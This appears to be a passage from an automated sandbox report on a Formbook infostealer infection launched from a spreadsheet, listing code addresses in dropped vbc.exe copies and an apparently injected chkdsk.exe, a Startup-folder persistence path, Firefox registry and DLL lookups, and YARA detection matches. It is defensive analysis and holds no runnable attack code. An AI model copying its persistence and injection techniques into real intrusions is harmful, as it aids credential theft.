Source: C:\Users\Public\vbc.exe Code function: 5_2_00860F3F 5_2_00860F3F
Source: C:\Users\Public\vbc.exe Code function: 5_2_0087D005 5_2_0087D005
Source: C:\Users\Public\vbc.exe Code function: 5_2_00853040 5_2_00853040
Source: C:\Users\Public\vbc.exe Code function: 5_2_0086905A 5_2_0086905A
Source: C:\Users\Public\vbc.exe Code function: 5_2_008CD06D 5_2_008CD06D
Source: C:\Users\Public\vbc.exe Code function: 5_2_008DD13F 5_2_008DD13F
Source: C:\Users\Public\vbc.exe Code function: 5_2_008F1238 5_2_008F1238
Source: C:\Users\Public\vbc.exe Code function: 5_2_0084F3CF 5_2_0084F3CF
Source: C:\Users\Public\vbc.exe Code function: 5_2_00857353 5_2_00857353
Source: C:\Users\Public\vbc.exe Code function: 5_2_00885485 5_2_00885485
Source: C:\Users\Public\vbc.exe Code function: 5_2_00861489 5_2_00861489
Source: C:\Users\Public\vbc.exe Code function: 5_2_0088D47D 5_2_0088D47D
Source: C:\Users\Public\vbc.exe Code function: 5_2_008F35DA 5_2_008F35DA
Source: C:\Users\Public\vbc.exe Code function: 5_2_0085351F 5_2_0085351F
Source: C:\Users\Public\vbc.exe Code function: 5_2_008D579A 5_2_008D579A
Source: C:\Users\Public\vbc.exe Code function: 5_2_008857C3 5_2_008857C3
Source: C:\Users\Public\vbc.exe Code function: 5_2_008E771D 5_2_008E771D
Source: C:\Users\Public\vbc.exe Code function: 5_2_008CF8C4 5_2_008CF8C4
Source: C:\Users\Public\vbc.exe Code function: 5_2_008EF8EE 5_2_008EF8EE
Source: C:\Users\Public\vbc.exe Code function: 5_2_008D394B 5_2_008D394B
Source: C:\Users\Public\vbc.exe Code function: 5_2_008D5955 5_2_008D5955
Source: C:\Users\Public\vbc.exe Code function: 5_2_00903A83 5_2_00903A83
Source: C:\Users\Public\vbc.exe Code function: 5_2_0084FBD7 5_2_0084FBD7
Source: C:\Users\Public\vbc.exe Code function: 5_2_008DDBDA 5_2_008DDBDA
Source: C:\Users\Public\vbc.exe Code function: 5_2_00877B00 5_2_00877B00
Source: C:\Users\Public\vbc.exe Code function: 5_2_008EFDDD 5_2_008EFDDD
Source: C:\Users\Public\vbc.exe Code function: 5_2_008DBF14 5_2_008DBF14
Source: C:\Users\Public\vbc.exe Code function: 5_2_0087DF7C 5_2_0087DF7C
Source: C:\Users\Public\vbc.exe Code function: 5_2_00D72050 5_2_00D72050
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 7_2_00392858 7_2_00392858
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 7_2_003998F0 7_2_003998F0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 7_2_0039D514 7_2_0039D514
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 7_2_00392D60 7_2_00392D60
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 7_2_00391540 7_2_00391540
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 7_2_0039A6D8 7_2_0039A6D8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 7_2_00392868 7_2_00392868
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 7_2_0039D138 7_2_0039D138
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 7_2_00396960 7_2_00396960
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 7_2_00395300 7_2_00395300
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 7_2_00398BC8 7_2_00398BC8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 7_2_00396E10 7_2_00396E10
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 7_2_00396E00 7_2_00396E00
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 7_2_0039C678 7_2_0039C678
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 7_2_0039DF90 7_2_0039DF90
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 7_2_005A28F8 7_2_005A28F8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 7_2_00F22050 7_2_00F22050
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_00401030 8_2_00401030
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_0041D997 8_2_0041D997
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_0041D20B 8_2_0041D20B
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_00402D87 8_2_00402D87
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_00402D90 8_2_00402D90
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_00409E30 8_2_00409E30
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_0041D6BE 8_2_0041D6BE
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_00402FB0 8_2_00402FB0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008CE0C6 8_2_008CE0C6
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008CE2E9 8_2_008CE2E9
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_009763BF 8_2_009763BF
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008F63DB 8_2_008F63DB
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008D2305 8_2_008D2305
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_0091A37B 8_2_0091A37B
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_0095443E 8_2_0095443E
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_009505E3 8_2_009505E3
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008EC5F0 8_2_008EC5F0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_00916540 8_2_00916540
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008D4680 8_2_008D4680
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008DE6C1 8_2_008DE6C1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_0091A634 8_2_0091A634
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_00972622 8_2_00972622
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008DC7BC 8_2_008DC7BC
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008DC85C 8_2_008DC85C
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008F286D 8_2_008F286D
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_0097098E 8_2_0097098E
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008D29B2 8_2_008D29B2
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_009649F5 8_2_009649F5
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008E69FE 8_2_008E69FE
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_0091C920 8_2_0091C920
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_0097CBA4 8_2_0097CBA4
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_00956BCB 8_2_00956BCB
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_00972C9C 8_2_00972C9C
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_0095AC5E 8_2_0095AC5E
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_00900D3B 8_2_00900D3B
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008DCD5B 8_2_008DCD5B
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_00902E2F 8_2_00902E2F
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008EEE4C 8_2_008EEE4C
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_0096CFB1 8_2_0096CFB1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_00942FDC 8_2_00942FDC
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008E0F3F 8_2_008E0F3F
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008FD005 8_2_008FD005
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008D3040 8_2_008D3040
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008E905A 8_2_008E905A
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_0094D06D 8_2_0094D06D
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_0095D13F 8_2_0095D13F
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_00971238 8_2_00971238
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008CF3CF 8_2_008CF3CF
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008D7353 8_2_008D7353
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008E1489 8_2_008E1489
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_00905485 8_2_00905485
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_0090D47D 8_2_0090D47D
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_009735DA 8_2_009735DA
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008D351F 8_2_008D351F
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_0095579A 8_2_0095579A
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_009057C3 8_2_009057C3
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_0096771D 8_2_0096771D
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_0094F8C4 8_2_0094F8C4
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_0096F8EE 8_2_0096F8EE
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_00955955 8_2_00955955
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_0095394B 8_2_0095394B
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_00983A83 8_2_00983A83
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_0095DBDA 8_2_0095DBDA
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008CFBD7 8_2_008CFBD7
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008F7B00 8_2_008F7B00
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_0096FDDD 8_2_0096FDDD
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_0095BF14 8_2_0095BF14
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008FDF7C 8_2_008FDF7C
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_00289882 8_2_00289882
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_00281069 8_2_00281069
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_00281072 8_2_00281072
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_00288152 8_2_00288152
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_0028DA0C 8_2_0028DA0C
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_0028AA52 8_2_0028AA52
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_00285B22 8_2_00285B22
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_00285B1F 8_2_00285B1F
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_00282CE9 8_2_00282CE9
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_00282CF2 8_2_00282CF2
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_00F22050 8_2_00F22050
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_025F1238 9_2_025F1238
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0254E2E9 9_2_0254E2E9
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_02557353 9_2_02557353
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0259A37B 9_2_0259A37B
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_02552305 9_2_02552305
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_025763DB 9_2_025763DB
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0254F3CF 9_2_0254F3CF
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_025F63BF 9_2_025F63BF
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0256905A 9_2_0256905A
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_02553040 9_2_02553040
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0257D005 9_2_0257D005
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0254E0C6 9_2_0254E0C6
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0259A634 9_2_0259A634
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_025F2622 9_2_025F2622
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0255E6C1 9_2_0255E6C1
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_02554680 9_2_02554680
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_025857C3 9_2_025857C3
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_025D579A 9_2_025D579A
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0255C7BC 9_2_0255C7BC
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0258D47D 9_2_0258D47D
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_02585485 9_2_02585485
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_02561489 9_2_02561489
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_02596540 9_2_02596540
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0255351F 9_2_0255351F
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0256C5F0 9_2_0256C5F0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_02603A83 9_2_02603A83
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_02577B00 9_2_02577B00
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0254FBD7 9_2_0254FBD7
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_025DDBDA 9_2_025DDBDA
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_025FCBA4 9_2_025FCBA4
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0255C85C 9_2_0255C85C
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0257286D 9_2_0257286D
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_025EF8EE 9_2_025EF8EE
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_025D5955 9_2_025D5955
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_025669FE 9_2_025669FE
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_025F098E 9_2_025F098E
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_025529B2 9_2_025529B2
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0256EE4C 9_2_0256EE4C
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_02582E2F 9_2_02582E2F
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0257DF7C 9_2_0257DF7C
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_02560F3F 9_2_02560F3F
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0255CD5B 9_2_0255CD5B
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_02580D3B 9_2_02580D3B
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_025EFDDD 9_2_025EFDDD
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_00082D87 9_2_00082D87
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_00082D90 9_2_00082D90
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_00089E30 9_2_00089E30
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_00082FB0 9_2_00082FB0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_00EA9882 9_2_00EA9882
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_00EA1069 9_2_00EA1069
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_00EA1072 9_2_00EA1072
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_00EA8152 9_2_00EA8152
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_00EAAA52 9_2_00EAAA52
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_00EADA0C 9_2_00EADA0C
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_00EA5B22 9_2_00EA5B22
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_00EA5B1F 9_2_00EA5B1F
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_00EA2CE9 9_2_00EA2CE9
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_00EA2CF2 9_2_00EA2CF2
Document misses a certain OLE stream usually present in this Microsoft Office document type
Source: PO11272020.xlsx OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: String function: 025BF970 appears 81 times
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: String function: 0259373B appears 238 times
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: String function: 02593F92 appears 110 times
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: String function: 0254E2A8 appears 38 times
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: String function: 0254DF5C appears 118 times
Source: C:\Users\Public\vbc.exe Code function: String function: 0084DF5C appears 137 times
Source: C:\Users\Public\vbc.exe Code function: String function: 008BF970 appears 84 times
Source: C:\Users\Public\vbc.exe Code function: String function: 00893F92 appears 132 times
Source: C:\Users\Public\vbc.exe Code function: String function: 0089373B appears 253 times
Source: C:\Users\Public\vbc.exe Code function: String function: 0084E2A8 appears 60 times
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: String function: 008CE2A8 appears 60 times
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: String function: 0093F970 appears 84 times
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: String function: 00913F92 appears 132 times
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: String function: 0091373B appears 253 times
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: String function: 008CDF5C appears 137 times
PE file contains strange resources
Source: vbc[1].exe.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Searches the installation path of Mozilla Firefox
Source: C:\Windows\SysWOW64\chkdsk.exe Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\52.0.1 (x86 en-US)\Main Install Directory
Tries to load missing DLLs
Source: C:\Windows\SysWOW64\chkdsk.exe Section loaded: mozglue.dll
Source: C:\Windows\SysWOW64\chkdsk.exe Section loaded: winsqlite3.dll
Yara signature match
Source: 00000004.00000002.2193415399.00000000036B6000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.2193415399.00000000036B6000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.2382057635.00000000001A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.2382057635.00000000001A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.2237322220.00000000001D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.2237322220.00000000001D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.2193296020.0000000003569000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.2193296020.0000000003569000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.2220261432.0000000003533000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2220261432.0000000003533000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.2237505269.0000000000540000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.2237505269.0000000000540000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.2218859578.0000000003399000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2218859578.0000000003399000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
